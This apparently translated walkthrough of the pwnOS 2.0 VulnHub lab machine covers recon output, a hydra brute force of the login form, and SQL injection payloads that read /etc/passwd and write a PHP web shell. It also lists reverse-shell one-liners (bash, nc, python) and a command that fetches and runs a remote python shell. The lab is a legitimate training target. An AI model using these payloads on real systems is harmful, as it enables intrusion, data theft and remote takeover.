table of Contents
hydra blasts the web login page
Enter the account password to log in to the blog
Inject to read the file load_file
sqlmap --file-write --file-dest did not succeed;
Target address
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
Host only mode: 10.10.10.100
The IP of the attacker should also be on the 10.10.10.0/24 network segment
Modify virtual network
collect message
<pre>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
</pre>
Whatweb check if it is a CMS
root@kali:~# whatweb 10.10.10.100
http://10.10.10.100 [200 OK] Apache[2.2.17], Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[[email protected]], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], IP[10.10.10.100], PHP[5.3.5-1ubuntu7], Title[Welcome to this Site!], X-Powered-By[PHP/5.3.5-1ubuntu7]
root@kali:~# whatweb -v 10.10.10.100
WhatWeb report for http://10.10.10.100
Status : 200 OK
Title : Welcome to this Site!
IP : 10.10.10.100
Country : RESERVED, ZZ
Summary : Email[[email protected]], PHP[5.3.5-1ubuntu7], Cookies[PHPSESSID], X-Powered-By[PHP/5.3.5-1ubuntu7], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], Apache[2.2.17]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.17 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : [email protected]
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.2.17 (Ubuntu) (from server string)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.3.5-1ubuntu7
Google Dorks: (2)
Website : http://www.php.net/
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.3.5-1ubuntu7 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Sun, 01 Nov 2020 12:03:58 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7
Set-Cookie: PHPSESSID=l0bmtqrfk7rh83bq157fbfm585; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 500
Connection: close
Content-Type: text/html
Visit 80 pages
IsIntS
Directory traversal
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
PHP information version
PHP Version 5.3.5-1ubuntu7 Apache/2.2.17 (Ubuntu) Server Administrator : webmaster@localhost PATH : /usr/local/bin:/usr/bin:/bin
Search for exploits
hydra blasts the web login page
root@kali:~# hydra -t 1 -l [email protected] -P /usr/share/wordlists/rockyou.txt -vV -f 10.10.10.100 http-post-form "/:email=^USER^&&password=^PASS^&&submit="Login"&&submitted="TRUE":error"
Trial and error
Blasting: killerbeesareflying
Error injection
Username:[email protected]' and updatexml(1,concat(0x3a,(0x0a,(select database()))))#
Password:x
Enter the account password to log in to the blog
View source code
view-source:http://sourceforge.net/projects/sphpblog/
Check login.php again and report an error
Inject to read the file load_file
email=admi'union select 1,2,3,group_concat(load_file('/etc/passwd')),5,6,7,8#&pass=123456&submit=Login&submitted=TRUE
into outfile function
email=admi'union select 1,2,3,'<?php system($_GET[\'cmd\'])',5,6,7,8 into outfile"/var/www/shell.php"#&pass=123456&submit=Login&submitted=TRUE
Command execution
Reverse shell [1]
bash: bash -i >& /dev/tcp/ip/port 0>&1
nc: nc -e /bin/sh ip port
Reverse shell [2]
python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Use python's reverse shell
Right escalation
Direct login succeeded
(2) View the blog source code
MSF
Created a new account password
login successful
Edit and upload pictures appear
Upload php-reverse-shell.php
Reverse shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
View the kernel version web
database
Elevate the right to ROOT
(Three) sqlmap
Find out whether the PHP page can be used to blast the universal password, and then try to inject sql;
Capture packet to get POST request
SQLMAP
Database information
Get user information
killerbeesareflying
log in
--os-shell file upload link
back door
Reverse shell
10.10.10.100/php-reverse-shell.php
No results can not rebound
Check the disable_function of phpinfo and find that there is no disable function
<?php system("cd /tmp; wget http://10.10.10.128/python.py; python python.py");?>
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
sqlmap --file-write --file-dest did not succeed;
Reference link
https://www.cnblogs.com/zongdeiqianxing/p/13455187.html
https://www.jianshu.com/p/2e492632c191
https://blog.csdn.net/Lonelyhat/article/details/105840547